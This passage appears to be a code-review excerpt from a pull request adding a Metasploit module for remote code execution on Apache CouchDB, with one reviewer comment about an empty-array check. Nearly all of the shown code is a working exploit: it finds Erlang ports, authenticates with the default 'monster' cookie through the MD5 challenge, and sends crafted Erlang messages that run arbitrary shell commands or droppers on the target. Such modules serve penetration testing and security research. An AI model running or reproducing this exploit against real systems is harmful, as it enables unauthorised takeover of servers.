modules/exploits/multi/http/apache_couchdb_erlang_rce.rb

```diff
@@ -0,0 +1,244 @@
+      res.each_line do |line|
+        erlang_ports << line.match(/\s(\d+$)/)[0]
+      end
+    rescue ::Rex::ConnectionError, ::EOFError, ::Errno::ECONNRESET => e
+      print_error("Error connecting to EDPM: #{e.class} #{e}")
+      disconnect
+      return
+    end
+    erlang_ports
+  end
+
+  # Attempts to connect to an erlang server with a default erlang cookie of 'monster', which is the
+  # default erlang cookie value in Apache CouchDB installations before 3.2.2
+  #
+  # @return [Socket] Returns a socket that is connected and already authenticated to the vulnerable Apache CouchDB Erlang Server
+  def connect_to_erlang_server(erlang_port)
+    print_status('Attempting to connect to the Erlang Server with an Erlang Server Cookie value of "monster" (default in vulnerable instances of Apache CouchDB)...')
+    connect(true, { 'RHOST' => datastore['RHOSTS'], 'RPORT' => erlang_port })
+    print_status('Connection successful')
+    sock.put(NAME_MSG)
+    sleep datastore['WfsDelay']
+    sock.get_once(5) # ok message
+    challenge = sock.get_once
+    challenge = challenge[9..12].unpack('N*')[0]
+    challenge_reply = "\x00\x15r\x01\x02\x03\x04"
+    md5 = Digest::MD5.new
+    md5.update(COOKIE + challenge.to_s)
+    challenge_reply << [md5.hexdigest].pack('H*')
+    sock.put(challenge_reply)
+    sleep datastore['WfsDelay']
+    challenge_response = sock.get_once
+
+    if challenge_response.nil?
+      print_error('Authentication was unsuccessful')
+      return
+    end
+    print_status('Erlang challenge and response completed successfully')
+
+    sock
+  rescue ::Rex::ConnectionError, ::EOFError, ::Errno::ECONNRESET => e
+    print_error("Error when connecting to Erlang Server: #{e.class} #{e} ")
+    disconnect
+    return
+  end
+
+  def compile_cmd(cmd)
+    msg = "\x83h\x02gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00\x00\x00h\x05w\x04callw\x02osw\x03cmdl\x00\x00\x00\x01k"
+    msg << [cmd.length].pack('S>')
+    msg << cmd
+    msg << "jw\x04user"
+    payload = ("\x70" + CTRL_DATA + msg)
+    ([payload.size].pack('N*') + payload)
+  end
+
+  def execute_command(cmd, opts = {})
+    payload = compile_cmd(cmd)
+    print_status('sending payload... ')
+    opts[:sock].put(payload)
+    sleep datastore['WfsDelay']
+  end
+
+  def exploit_socket(sock)
+    case target['Type']
+    when :unix_cmd, :win_cmd
+      execute_command(payload.encoded, { sock: sock })
+    when :linux_dropper, :win_dropper, :psh_stager
+      execute_cmdstager({ sock: sock })
+    else
+      fail_with(Failure::BadConfig, 'Invalid target specified')
+    end
+  end
+
+  def exploit
+    # If the check method has already been run, use the vulnerable socket that has already been identified
+    if @vulnerable_socket
+      exploit_socket(@vulnerable_socket)
+    else
+      erlang_ports = get_erlang_ports
+      fail_with(Failure::BadConfig, 'This endpoint does not appear to expose any erlang ports') unless erlang_ports.instance_of?(Array)
```

Comment:
Same issue here as above, checking for an Array when in reality return value will always be an array and you should be checking if its empty.